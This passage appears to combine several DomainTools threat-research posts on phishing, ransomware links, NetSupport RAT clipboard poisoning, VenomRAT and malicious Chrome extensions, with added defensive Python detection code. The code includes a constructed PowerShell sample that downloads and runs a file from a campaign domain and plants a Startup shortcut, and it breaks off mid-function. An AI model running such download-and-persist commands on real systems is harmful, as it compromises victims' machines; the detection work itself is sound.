- Watch for persistence indicators in Windows registry and scheduled tasks
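The TTPs listed above can be expressed as checks over process-creation and registry events. The following is an added example, not code from the DomainTools post: a small Python scanner using a constructed Sysmon-style event schema (type, id, image, parent, cmdline or target), run over constructed sample events that mirror the ZIP, LNK, wscript.exe, LOLBin, PowerShell and Run-key chain; the rule names, sample paths and the stand-in encoded payload are assumptions.

```python
import base64
import re

# Binaries and flags taken from the TTP list; the event schema and sample events are constructed.
LOLBINS = {"ie4uinit.exe", "regsvr32.exe", "msxsl.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS_RE = re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I)
SCRIPT_FILE_RE = re.compile(r"\\(?:Temp|Downloads)\\.*\.(?:js|jse|vbs)\b", re.I)


def image_name(path):
    """Lower-cased file name of an image path (C:\\Windows\\System32\\wscript.exe -> wscript.exe)."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Recover the script behind -EncodedCommand (Base64 of UTF-16LE), or None if absent or invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event):
    """Return (rule, detail) pairs for one event dict."""
    hits = []
    if event["type"] == "process":
        img, parent, cmd = image_name(event["image"]), image_name(event["parent"]), event["cmdline"]
        # The LNK inside the ZIP launches a script host on a .js dropped under Temp or Downloads.
        if img in SCRIPT_HOSTS and parent == "explorer.exe" and SCRIPT_FILE_RE.search(cmd):
            hits.append(("lnk_script_host", cmd))
        # LOLBin stage spawned directly by the script host.
        if img in LOLBINS and parent in SCRIPT_HOSTS:
            hits.append(("lolbin_from_script_host", cmd))
        # Hidden or policy-bypassing PowerShell with an encoded command; surface the decoded script.
        if img in {"powershell.exe", "pwsh.exe"}:
            decoded = decode_encoded_command(cmd)
            if decoded is not None and (HIDDEN_RE.search(cmd) or BYPASS_RE.search(cmd)):
                hits.append(("encoded_hidden_powershell", decoded))
    elif event["type"] == "registry":
        # Run-key persistence written by a script host, LOLBin or PowerShell rather than an installer.
        writer = image_name(event["image"])
        if RUN_KEY_RE.search(event["target"]) and writer in SCRIPT_HOSTS | LOLBINS | {"powershell.exe"}:
            hits.append(("run_key_persistence", event["target"]))
    return hits


def scan(events):
    """Run every rule over every event; returns [(event id, rule, detail), ...]."""
    return [(e["id"], rule, detail) for e in events for rule, detail in evaluate(e)]


# Constructed sample events. The encoded payload is a harmless stand-in, not a captured command.
_ENC = base64.b64encode("Start-Sleep -Seconds 1".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'wscript.exe //B //E:jscript "C:\Users\hr\AppData\Local\Temp\Temp1_resume.zip\Resume.js"'},
    {"id": 2, "type": "process", "image": r"C:\Windows\System32\msxsl.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"msxsl.exe C:\Users\hr\AppData\Local\Temp\a.xml C:\Users\hr\AppData\Local\Temp\b.xsl"},
    {"id": 3, "type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\msxsl.exe",
     "cmdline": f"powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -EncodedCommand {_ENC}"},
    {"id": 4, "type": "registry", "image": r"C:\Windows\System32\wscript.exe",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    # Benign controls: an admin running a plain command, and regsvr32 launched from Explorer.
    {"id": 5, "type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "powershell -NoProfile -Command Get-Date"},
    {"id": 6, "type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\plugin.dll"},
]

if __name__ == "__main__":
    for event_id, rule, detail in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}: {detail}")
```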
The Efficacy of Low-Complexity Phishing Campaigns
FIN6’s Skeleton Spider campaign shows how effective low-complexity phishing campaigns can be when paired with cloud infrastructure and advanced evasion. By using realistic job lures, bypassing scanners, and hiding malware behind CAPTCHA walls, they stay ahead of many detection tools.
Security teams and HR departments alike must stay informed and vigilant. Training, layered defenses, and early detection of unusual traffic or file types are critical to disrupting these types of attacks.
Stay informed. Stay alert. Stay safe.
IOCs on GitHub
If the community has any additional input, please let us know.
Sign Up For DomainTools Investigations’ Newsletter for the Latest Research
Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

Understanding the landscape of cyber threats, particularly Russian-affiliated ransomware, is a complex and evolving challenge. The traditional model of tracking distinct, unified ransomware groups is becoming increasingly difficult. In the "post-Conti era," ransomware has transformed into a marketplace of mutations. It's no longer about centralized operations but rather a fractured ecosystem where allegiances shift and connections are often hidden.
In order to develop a deeper understanding and help others in the community in the process, Jon DiMaggio at Analyst1, Scylla Intel, and the DomainTools Investigations Team dove into a research project that culminated in a detailed infographic called “A Visual and Analytical Map of Russian-affiliated Ransomware Groups.” This work follows previous research DomainTools undertook in tracking ransomware families and provides a visual representation of complex connections in this space.
The goal of this project was not simply attribution or listing individual groups. Instead, we set out to map hidden connections between criminal factions, going beyond just mapping "families" to understand the intricate relationships between them. The core focus was on identifying overlaps in human operators, code fragments, infrastructure, and TTPs (Tactics, Techniques, and Procedures).

The Creation Process: A "Spider-Out" Investigation
Creating this map required a deep dive into the operational realities of various ransomware actors. Our methodology involved performing a "spider-out" incremental investigation. We began with well-known groups like Conti, LockBit, and Evil Corp, then expanded our research outwards, following the threads of connection.
To gather the necessary information, we drew upon a variety of sources:
- OSINT (Open-Source Intelligence)
- Historic infrastructure data
- Proprietary threat intelligence
- HUMINT (Human Intelligence)
It's important to note that the analysis only includes publicly available information; nothing is revealed that could tip off adversaries.
Our analysis of these diverse data points helped isolate valuable signals from the surrounding noise. This included overlapping IP addresses, passive DNS records, shared certificates, web content, and delivery vectors used by different groups. These infrastructure overlaps imply potential resource pooling, bulletproof hosting, or affiliate-level reuse. We also analyzed code and TTP crossovers, such as the overlap between Black Basta and Qakbot or the use of legacy Trickbot infrastructure. The prevalence of shared tools like AnyDesk and Quick Assist also suggested common training, playbooks, or crossovers in operator organizations. And finally, we looked closely at the most important element, the people in these groups.
Visualizing the Overlaps: Human Capital and Operator Drift
Perhaps one of the most significant findings visualized in the infographic is the human overlap and operator drift. Our research uncovered instances of known individual actors migrating across different ransomware ecosystems. For example, sources indicate individuals like “Wazawaka” have been associated with multiple groups including REvil, Babuk, LockBit, Hive, and Conti. Similarly, "Bassterlord" moved from REvil to Avaddon, then to LockBit, and finally to Hive.
This phenomenon highlights a crucial insight: brand allegiance among these operators is weak, and human capital appears to be the primary asset, rather than specific malware strains. Operators adapt to market conditions, reorganize in response to takedowns, and trust relationships are critical. These individuals will choose to work with people they know regardless of the name of the organization. Indeed, rebranding in this context is a feature, not a bug. The infographic helps to visualize how these individuals move between groups, carrying their expertise and capabilities with them.
Key Takeaways from the Mapping:
The creation of this infographic reinforces several strategic takeaways:
- Reuse does not equal identity. Different groups may share code or have human overlap but are not the same entity.
- Group labeling is increasingly obsolete.
- The modern threat landscape is best understood by tracking clusters of activity, not just named groups, and focusing on similar activity rather than specific names.
This new perspective, visually represented in this infographic, is crucial for understanding how ransomware operations function today. Groups act like modules, specializing and adapting as the marketplace matures. They exhibit a separation of responsibilities, with distinct roles for negotiators, developers, infrastructure managers, and leadership. Sanctions evasion strategies, such as Evil Corp’s repeated rebranding paired with infrastructure reuse, prove that while names may change, capabilities endure.
Understanding these hidden alliances and overlaps is key to developing and maturing more effective disruption strategies. As a community, we need to evolve how we track actors and criminal brands, recognizing that shared infrastructure or website artifacts might serve as more stable "fingerprints" than group names.
The full infographic provides a comprehensive visual guide to these complex relationships. We believe this work offers a new lens through which to view and counter Russian-affiliated ransomware, emphasizing the need to understand the underlying ecosystem and human networks rather than just transient names and tools.

This report details a malicious campaign that uses deceptive websites, including spoofed Gitcodes and fake Docusign verification pages, to trick users into running malicious PowerShell scripts on their Windows machines. Victims are lured into copying and pasting these scripts into their Windows Run prompt, which then download and execute multiple stages of additional scripts, ultimately leading to the installation of the NetSupport RAT (remote access trojan).
Malicious Multi-Stage Downloader PowerShell Scripts Identified
Our team identified malicious multi-stage downloader PowerShell scripts hosted on multiple themed websites, including Gitcodes and fake Docusign CAPTCHA verifications. These sites attempt to deceive users into copying an initial PowerShell script and running it from the Windows Run prompt. Upon doing so, the script downloads and executes another downloader script, which in turn retrieves and executes additional payloads, eventually installing NetSupport RAT on the infected machine.

Malicious PowerShell Scripts Hosted on Gitcodes
Malicious PowerShell scripts were found hosted on instances of Gitcodes sites for the purpose of downloading second-stage PowerShell scripts. The second stage also functioned as a downloader, making three or more web requests to retrieve and execute a third stage of scripts from other domains, which then retrieve and run a fourth stage, resulting in NetSupport RAT running on the victim host.
![Domain: gitcodes[.]org resolving website with a Gitcodes service running titled: “Gitcodes - #1 paste tool since 2002!”](https://cdn.prod.website-files.com/6941445776ba1afe6af83186/695263af101e496079c4d160_Code-Repository.png)
Gitcodes is populated with a malicious PowerShell script that concatenates multiple strings to form a domain. It then initiates a web request, using the specified user agent and that domain, to download and run the returned script.
![the script calls out to “http[:]//tradingviewtool[.]com” using the user agent “TradingView.”](https://cdn.prod.website-files.com/6941445776ba1afe6af83186/695263af101e496079c4d15a_tradingview-developer-mode.png)
The script retrieved from tradingviewtool[.]com subsequently invokes additional web requests to download three files from a different domain, “tradingviewtoolz[.]com”, and also initiates multiple requests to tradingviewtool[.]com. Initially, the script reaches out to https[:]//tradingviewtool[.]com/info2.php, which appears to be a check-in that records the computer name at initial execution. Once the script completes its intended purpose and cleans up its local artifacts, it calls the same domain again at https[:]//tradingviewtool[.]com/info3.php with the computer name, likely indicating the host is infected.

As seen in the capture above, this second-stage script performs a series of malicious actions to install a payload and make it persistent, all while trying to hide its activity and deceive the user. The script essentially functions as a downloader, retrieving NetSupport RAT and running it on the system. The three files include a legitimate 7-Zip executable, which the script uses to unpack “client32.exe”; it then creates a new entry in the Windows Registry “Run” key for the current user. This ensures that `client32.exe` will automatically start every time the user logs in, establishing persistence for the malware. Naming the entry "My Support" is an attempt to make it look less suspicious in lists of startup programs.
Uncovering the Broader Malware Ecosystem Behind the Campaign
The observed infrastructure varied, but the combination of registration and website configuration patterns, together with the repeated use of the same malicious payloads, enabled the identification of additional lure sites serving similar malicious downloader scripts.
Registrar:
- Cloudflare
- NameCheap
- NameSilo
NameServer:
- cloudflare[.]com
- luxhost[.]org
- namecheaphosting[.]com
SSL Issuer: WE1
Website Title contains Gitcodes

Fake Docusign CAPTCHAs Used to Deploy NetSupport RAT
Pivoting on the NetSupport RATs being distributed and the associated infrastructure, additional malware distribution domains were identified, including Docusign-spoofing websites. As with the Gitcodes sites, multiple stages of script downloaders were observed, resulting in NetSupport RAT being installed on victim machines.
An initial payload retrieves an “s.php” file from a domain spoofing Docusign. It then unzips the file and launches a script within it.
The main malicious functionality is present in “docusign.sa[.]com/verification/s.php,” which is initially ROT13 encoded, likely as a simple obfuscation to avoid signature detections. ROT13 (rotate by 13) is a form of Caesar cipher in which each letter is replaced with the letter 13 positions after it in the alphabet; applying the operation twice restores the original text.
The page is designed to look like a Cloudflare "Checking your browser" / CAPTCHA page, mixed with Docusign branding. The initial screen presents a fake CAPTCHA checkbox (.captcha-check). Upon clicking, "s.php?an=0" is requested, likely to log the click attempt. The page then performs clipboard poisoning: an “unsecuredCopyToClipboard()” function is called, copying an encoded, multi-layered string to the user’s clipboard. The user is instructed to press Win+R, Ctrl+V, Enter, in other words to open the Windows Run prompt, paste in the malicious script, and run it.

Also on the s.php page, after the clipboard poisoning, an interval timer is set to make an AJAX GET request to c.php every second. If c.php returns "1," the current page (s.php) reloads (window.location.reload()). This is likely a C2 (Command and Control) mechanism waiting for the victim to paste and run the PowerShell script on their machine.
The string copied to the user’s clipboard decodes to the following PowerShell script:

This script downloads a persistence script, “wbdims.exe,” from GitHub. It then starts it as a process and creates a COM object for Windows Script Host, which it uses to create a shortcut in the Startup folder so the file executes automatically when the user logs in.
While this payload was no longer available during the time of investigation, the expectation is that it checks in with the delivery site via “docusign.sa[.]com/verification/c.php.” Upon doing so, it triggers a refresh in the browser for the page to display the content of “docusign.sa[.]com/verification/s.php?an=1.”

The initial clipboard poisoning delivered a first-stage PowerShell downloader. The refresh of s.php (to s.php?an=1) delivers this second-stage PowerShell script, which then downloads and executes a third-stage payload (jp2launcher.exe from the zip file) retrieved by passing “an=2” argument to the same php page “docusign.sa[.]com/verification/s.php?an=2.”
Downloaded Zip File: 254732635529a0567babf4f78973ad3af5633fd29734ea831e5792292bbf16cd
The script then unzips the file and starts a process called “jp2launcher.exe”, which subsequently, goes through additional stages of file retrievals and executions resulting in a NetSupport RAT (3acc40334ef86fd0422fb386ca4fb8836c4fa0e722a5fcfa0086b9182127c1d7) being installed on the victim machine with these associated network actions:
http[:]//mhousecreative[.]com
http[:]//170.130.55[.]203:443/fakeurl.htm
In summary, the fake Docusign website is likely distributed via phishing attempts over email and/or social media. It is the beginning of an elaborate multi-stage NetSupport RAT delivery method that relies upon deceiving users into "verifying they are human" by copying and running a malicious PowerShell script on their machines. The multiple stages of scripts downloading and running scripts that download and run yet more scripts is likely an attempt to evade detection and be more resilient to security investigations and takedowns.
By breaking the attack into small, distinct steps, the attacker increases the chance that at least one stage will slip past initial signature-based defenses. Additionally, the early phase persistence files appear to be short lived or quickly identified and taken down, however the subsequent later stages appear to be active for longer time frames. This demonstrates the method's somewhat effective disposable pawn strategy with a more resilient late game setup.
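A defender's triage helper for the clipboard strings and Gitcodes scripts described above: this is an added example, not code from the DomainTools post. It peels ROT13 and Base64 layers until PowerShell indicators appear, reassembles a domain built from concatenated strings (as the Gitcodes script does), and reports download, execution and persistence indicators with defanged URLs. The sample clipboard string, its layering order (the post only names ROT13) and the indicator regexes are constructed assumptions.

```python
import base64
import codecs
import re
import string

# Indicator families drawn from the behaviour the post describes: fetch, run, persist, hide.
INDICATORS = {
    "download": re.compile(r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|DownloadFile)\b", re.I),
    "execute": re.compile(r"\b(?:Invoke-Expression|iex|Start-Process)\b", re.I),
    "persist": re.compile(r"WScript\.Shell|CreateShortcut|\\Startup\\|CurrentVersion\\Run", re.I),
    "hidden": re.compile(r"-w(?:indowstyle)?\s+hidden|-(?:e|ec|enc|encodedcommand)\s", re.I),
}
PRINTABLE = set(string.printable)
CONCAT_RE = re.compile(r"'([^']*)'(?:\s*\+\s*'[^']*')+")       # 'a'+'b'+'c'
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*\(?'([^']*)'\)?")          # $d='literal'
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def indicator_hits(text):
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def try_base64(text):
    """Base64-decode text to a printable string (UTF-16LE as used by -EncodedCommand, else UTF-8), or None."""
    try:
        raw = base64.b64decode(re.sub(r"\s+", "", text), validate=True)
    except ValueError:
        return None
    for enc in ("utf-16-le", "utf-8"):
        try:
            out = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if out and all(c in PRINTABLE for c in out):
            return out
    return None


def peel_layers(blob, max_layers=6):
    """Undo Base64 and ROT13 layers until PowerShell indicators appear; returns (text, layers applied)."""
    text, layers = blob.strip(), []
    for _ in range(max_layers):
        if indicator_hits(text):
            break
        decoded = try_base64(text)
        if decoded is not None:
            text, layers = decoded, layers + ["base64"]
            continue
        rotated = codecs.decode(text, "rot_13")
        if indicator_hits(rotated) or try_base64(rotated) is not None:
            text, layers = rotated, layers + ["rot13"]
            continue
        break
    return text, layers


def _join(m):
    return "'" + "".join(re.findall(r"'([^']*)'", m.group(0))) + "'"


def resolve_string_building(ps):
    """Join 'a'+'b' literals and inline single-quoted variable assignments so split domains reassemble."""
    joined = CONCAT_RE.sub(_join, ps)
    for name, value in ASSIGN_RE.findall(joined):
        joined = re.sub(r"\$" + re.escape(name) + r"\b", lambda _m, v=value: "'" + v + "'", joined)
    return CONCAT_RE.sub(_join, joined)


def defang(url):
    scheme, rest = url.split("://", 1)
    host, _, path = rest.partition("/")
    return f"{scheme}[:]//{host.replace('.', '[.]')}" + (f"/{path}" if path else "")


def triage_clipboard(blob):
    """Decode a captured clipboard string, normalise it, and report indicators, URLs and a verdict."""
    text, layers = peel_layers(blob)
    script = resolve_string_building(text)
    hits = indicator_hits(script)
    urls = [defang(u) for u in URL_RE.findall(script)]
    verdict = "suspicious" if len(hits) >= 2 or (urls and hits) else "benign"
    return {"layers": layers, "indicators": hits, "urls": urls, "verdict": verdict, "script": script}


# Constructed sample standing in for the decoded first stage (fetch wbdims.exe, start it, Startup shortcut),
# wrapped as Base64(UTF-16LE) and then ROT13. Not a captured payload.
_PS_SAMPLE = (
    "$d=('tradingview'+'tool'+'.com'); "
    "iwr ('http://'+$d+'/info2.php') -UserAgent 'TradingView' -OutFile wbdims.exe; "
    "Start-Process wbdims.exe; "
    "(New-Object -ComObject WScript.Shell).CreateShortcut(\"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wbdims.lnk\").Save()"
)
CLIPBOARD_SAMPLE = codecs.encode(base64.b64encode(_PS_SAMPLE.encode("utf-16-le")).decode(), "rot_13")

if __name__ == "__main__":
    print(triage_clipboard(CLIPBOARD_SAMPLE))
```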
The Widening Scope of Clipboard Poisoning Attacks
While the use of ROT13 encoding can make some detections more difficult, particularly when depending on services that attempt to preprocess server scan data, the samples themselves allow for more unique identification such as the consistent use of the same strings and comment values within the php code.
Pivots on the clipboard poisoning scripts identified several other nearly identical instances of the code on a wider range of spoofed content, including Okta and popular media apps. Additionally, Discord and GitHub were also identified as hosting next-stage malware, such as in the following example.
While attribution of this campaign is unclear, pivots on the associated infrastructure and malware identified reuse of the same NetSupport RAT hashes, similar delivery URL patterns, and similar domain naming and registration patterns observed in a previously reported cluster of SocGholish activity. Notably, the techniques involved are commonplace, and NetSupport Manager is a legitimate administration tool known to be leveraged as a RAT by multiple threat groups such as FIN7, Scarlet Goldfinch, STORM-0408 and others.
Key Takeaways and Security Recommendations
This analysis highlights a sophisticated and persistent malicious campaign designed to deliver the NetSupport RAT through deceptive means, primarily leveraging spoofed Gitcodes and fake Docusign verification pages. The attackers employ a multi-stage approach, using seemingly innocuous "verify you are human" CAPTCHAs and malicious PowerShell scripts disguised as legitimate prompts to trick users into infecting their own machines. This method capitalizes on user trust and familiarity with common online interactions, such as document verification and code sharing platforms.
Key Security Recommendations:
- Exercise extreme caution when prompted to copy and paste scripts into the Windows Run prompt: legitimate websites rarely, if ever, require users to execute PowerShell commands directly. Always verify the source and legitimacy of any such requests.
- Be wary of CAPTCHA-like verifications that instruct you to run commands: genuine CAPTCHAs do not involve running scripts. Any prompt to do so should be treated as highly suspicious.
- Verify the authenticity of websites: Double-check the URL and SSL certificates of websites, especially those that request sensitive actions or information. Be cautious of lookalike domains.
This campaign serves as a stark reminder of the evolving threat landscape. Attackers are continuously refining their techniques to exploit user behavior and bypass traditional security measures. Vigilance, user education, and proactive security practices are paramount in defending against these increasingly sophisticated threats. The "self-infect" tactic, while seemingly simple, can be highly effective, emphasizing the need for users to remain skeptical and verify all interactions before acting.
IOCs on GitHub
https://github.com/DomainTools/SecuritySnacks/blob/main/2025/prove-you-are-human.csv

A malicious campaign using a fake website to spread VenomRAT, a Remote Access Trojan (RAT), is detailed in this analysis. The malware includes tools for password theft and stealthy access. This research examines the attackers' methods, such as deceptive websites and command infrastructure, indicating a clear intent to target individuals for financial gain by compromising their credentials, crypto wallets, and potentially selling access to their systems.
VenomRAT, StormKitty, and SilentTrinity Deployment
Malicious domain “bitdefender-download[.]com” resolves a website titled “DOWNLOAD FOR WINDOWS,” which spoofs Bitdefender’s Antivirus for Windows download page.

The “Download For Windows” button initiates a file download from the following Bitbucket URL:
https[:]//bitbucket[.]org/sadsafsadfsadf/dsfgdsgssdfgdsg/downloads/BitDefender.zip
The Bitbucket URL redirects to its content source on Amazon S3:
https[:]//bbuseruploads.s3.amazonaws[.]com/9e2daa63-bae3-4cbb-9f88-8154ba43261f/downloads/aa7b9593-2ccd-4cd0-9e04-9b4a7da9276b/BitDefender.zip
The bundled executable StoreInstaller.exe was found to contain malware configurations associated with VenomRAT. It also contained code associated with open source post-exploitation framework SilentTrinity and StormKitty stealer.
A report by Acronis describes VenomRAT as a RAT that originated as a fork of the open-source Quasar RAT. It is often used for initial access and persistence. Capabilities include remote access, credential theft, keylogging, exfiltration and more.
At a high level, the three malware families function as follows:
- VenomRAT provides initial and ongoing access to victim machines
- StormKitty quickly gathers credentials on the system
- SilentTrinity is used for exfiltration and stealthy long term access
The inclusion of SilentTrinity and StormKitty (both open-source malware tools) indicates the attacker’s dual focus: rapidly harvesting financial credentials and crypto wallets during initial access, while also establishing stealthy, persistent access for potential long-term exploitation. The implications of long term access may include repeat compromise or selling access.
VenomRAT
Observed VenomRAT configurations showed multiple identifiable attributes that allowed for reliable pivots to other samples likely created by the same actor including the reuse of the same IP and port, 67.217.228[.]160:4449, for command and control.
Related samples using the same VenomRAT configurations:
VenomRAT C2 IPs
A reused RDP (port 3389) service configuration was identified via the Shodan query “hash:-971903248”, allowing pivots to additional IP addresses with the same configuration. Several of the IPs were confirmed to be used as C2s for VenomRAT and are suspected to have been configured by the same actor.
Delivery Sites:
Credential Harvesting Sites
The lure domain spoofing Bitdefender was observed with infrastructure and time-proximity overlaps to other malicious domains impersonating banks and generic IT services, suspected of being used for phishing activity.
NameServer: cloudflare.com
IP ISP: cloudflare.com
Registrar:
- PDR Ltd
- GMO Internet
- NameSilo
SSL Issuer:
- Cloudflare TLS
- WE1
Server Type: cloudflare
Protection from Open-Source Malware
This investigation reveals a deceptive campaign using VenomRAT, a powerful remote access tool, disguised as a legitimate Bitdefender antivirus download. Imagine clicking a button on what looks like a trusted site, only to unleash a trio of malicious programs – VenomRAT, StormKitty, and SilentTrinity – onto your system. These tools work in concert: VenomRAT sneaks in, StormKitty grabs your passwords and digital wallet info, and SilentTrinity ensures the attacker can stay hidden and maintain control. We tracked down the attackers' command centers, identified other malware they likely used, and uncovered their web of fake download sites and phishing traps spoofing as banks and online services.
This campaign underscores a constant trend: attackers are using sophisticated, modular malware built from open-source components. This "build-your-own-malware" approach makes these attacks more efficient, stealthy, and adaptable. While the open-source nature of these tools can help security experts spot them faster, the primary victims here are everyday internet users. These criminals are after your hard-earned money, targeting your bank accounts and cryptocurrency wallets with fake login pages and malware disguised as safe software.
This isn't just a problem for big companies – it's a threat to everyone online. So, what can you do?
- Be extremely cautious when downloading software. Double-check website addresses to make sure they're legitimate, especially for banking or login pages.
- Never enter your credentials on a site you're not 100% sure about.
- Practice safe internet habits: avoid clicking on suspicious links or opening unexpected email attachments.
IOCs on GitHub
https://github.com/DomainTools/SecuritySnacks/blob/main/2025/VenomRAT-Malware-Campaign.csv

An unknown actor has been continuously creating malicious Chrome browser extensions since approximately February 2024. The actor creates websites that masquerade as legitimate services (productivity tools, ad and media creation or analysis assistants, VPN services, crypto, banking and more) to direct users to install corresponding malicious extensions on Google’s Chrome Web Store (CWS). The extensions typically have a dual functionality: they generally appear to function as intended, but also connect to malicious servers to send user data, receive commands, and execute arbitrary code.
Example: A DeepSeek Chrome Extension themed lure website ‘deepseek-ai[.]link’
![A DeepSeek Chrome Extension themed lure website ‘deepseek-ai[.]link’](https://cdn.prod.website-files.com/6941445776ba1afe6af83186/695263b288864d7f5afb84ac_AD_4nXfqv6WgEBSGGa9_Bsv0MYP90Secxk_dKkttE-g2s221Rt6rHn7MXFquTqsGoKFiV6aDrfoY8L5EdDRu5ZQ8Vf2X0TkaMhxiJw8vl8UHc80lHb90m5jURP8jc7IMPuGVoqqNcok2Bg.png)
The extensions analyzed appear to have working or partially working functionality and are commonly configured with excessive permissions to interact with every site the browser visits and retrieve and execute arbitrary code from a network of other actor controlled domains.
While each extension was found to be relatively different, the hosting infrastructure and code structures were consistent. Multiple extensions were observed using a “onreset” event handler trick on a temporary document object model (DOM) element to execute code, likely to bypass content security policy (CSP). The extensions hardcode one of the actor’s API servers, typically in a file named “background.js” or “background.iife.js” or for older extensions “src/pages/background/index.js.” These files were also found to typically contain the majority of the malicious functionality of the extensions.
Registration Patterns for Actor Lure Websites
Common registration patterns were observed going back to October 2024.
- Registrar: NameSilo, LLC
- NameServer: cloudflare.com
- IP ISP: CloudFlare Inc.
- SSL Issuer Common Name: WE1
- Registrant: Domain Administrator
- Server Type:
- cloudflare
- proxygen-bolt
- MX Server: cloudflare.net
Additionally, the same Facebook tracker IDs were commonly reused across the lure websites.
The following are a sampling of the lure websites, which cover a wide range of topics and themes. The list of identified domains is provided on GitHub.
Malicious Extensions
It is worth noting that the extensions appear to be at least partly functional with respect to the theme of their lure. However, where an extension relies on a third-party service for that functionality, such as FortiVPN or DeepSeek AI, the third-party API keys are hard-coded into the extension code, which is an extremely poor security practice.
Example 1: Lure Site of Manus AI to Install an AI Assistant Extension
The first things to note about the extension are the extensive permissions it attempts to grant itself in the manifest.json file.

The “background.js” script fetches and applies declarativeNetRequest rules from the backend. This allows the author to modify network requests (block, redirect, modify headers) after the extension is installed, bypassing Chrome Web Store review for those changes. This could be used for malicious redirects, ad injection, or tracking.
The background script communicates with api.sprocketwhirl[.]top, sending encrypted system information (platform, language, memory, cores, timezone, IP, country code) and receiving dynamic declarativeNetRequest rules and potentially executable code.
The content script (injected into all pages) executes arbitrary code retrieved from chrome.storage.local (report key), which was placed there by the background script after fetching it from api.sprocketwhirl[.]top.
Example 2: Lure Site of FortiVPN Client Extension
The extension also attempts to grant itself extensive permissions as seen from its manifest.json file.

The extension has a dual functionality in which it provides some of the advertised purpose. In this case, a browser extension based VPN service by connecting to wss[:]//leviathan.whale-alert[.]io/ws using a hardcoded API key. At the same time, however, the extension also connects to a malicious backend client wss[:]//api.infograph[.]top/api and listens for commands. It uses a websocket keep-alive mechanism to maintain connectivity to the backend server as well as sending periodic ping and report messages.
When commanded, it uses chrome.cookies.getAll({}) to retrieve all browser cookies, compresses them using pako, encodes them in Base64, and sends them back to the backend infograph[.]top server.
It can be commanded to establish a separate WebSocket connection to act as a network proxy, potentially routing the user’s traffic through malicious servers. The proxy target is provided by the backend command and also implements proxy authentication handling.
The extension fetches arbitrary scripts from an actor-controlled server. It then injects the scripts into active browser tabs by using chrome.tabs.sendMessage to the tab’s content scripts, triggering their execution within the tabs.
Additionally, the extension enables dynamic network rules via setup response from the backend that can contain declarativeNetRequest rules which are then applied, allowing the backend to modify network traffic post-install.
Example 3: Lure of SiteStats Extension
Like the previous examples, this extension also grants itself extensive permissions and script execution on every site as seen from its manifest.json file.

The extension allows modifying network requests via rules. It is also able to make web requests, which is primarily observational in MV3, but combined with broad host permissions, it can still be used for tracking or reconnaissance.
Similar to the other extensions identified, it connects to an actor controlled backend server, api.zorpleflux[.]top, defined in the “background.iife.js” file. It also sends periodic ping and report messages to the backend server.
It is capable of setting up a secondary proxy WebSocket connection, allowing traffic routing via the user’s browser, commanded by the backend. It implements a reverse proxy functionality by handling proxied requests via fetch, compressing responses with pako, and relaying back to the backend.
The extension also conducts arbitrary script execution it receives from the backend server and uses chrome.tabs.sendMessage to send it to the content script declared in the manifest.json file for execution.
Actor API Endpoints
The extensions hardcode one of the actor’s API servers, typically in a file named “background.js” or “background.iife.js.” For example, the lure site deepseek-ai[.]link directs users to install the Chrome extension with ID “pocfdebmmcmfanifcfeeiafokecfkikj.” Upon installation, this extension actively communicates with another actor domain, api.glimmerbloop[.]top, to report installation and fingerprinting data and to receive instructions and payloads.
Many of the analyzed extensions had variations in functionality and implementation of the API payload execution steps including what browser fingerprinting information was sent in the initial transaction. The following were consistent elements observed:
- Hardcoding actor API domain in “background.js” or “background.iife.js” file
- Use of HMAC with SHA-256 signing algorithm
- Use of JWT authentication
- Use of extension ID in UTF-8 bytes format as a secret key to sign the JWT payload
- Base64 encoding the payload prior to sending to the API server
To establish a connection to the actor’s API server, the extensions create a token using a standard JWT library that combines a UUID, the extension ID, version, and country code, then adds the JWT claims Issued At and Expiration Time. The payload is signed with HMAC-SHA256 using a secret key that was consistently observed to be the UTF-8 bytes of the extension ID string. The resulting token is then Base64 encoded with btoa() and sent to the API server as the authentication mechanism for retrieving arbitrary code for the extension to execute.
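Because the signing key is the extension ID itself, a captured token can be attributed to this family by recomputing the HMAC. The following is an added example, not code from the DomainTools post: a Python check that decodes the outer Base64 layer, verifies the HS256 signature with a candidate extension ID as key, and sweeps the IDs installed in a profile. The claim names (uuid, ext, ver, cc) and the token-building helper used to produce test material are assumptions; the post lists only the fields.

```python
import base64
import hashlib
import hmac
import json
import time
import uuid


def _b64url(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64url(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def build_actor_style_token(extension_id, version, country, now=None):
    """Reproduce the documented scheme to create test material: HS256 JWT keyed with the UTF-8
    bytes of the extension ID, then Base64-encoded again (the btoa() step). Claim names are assumed."""
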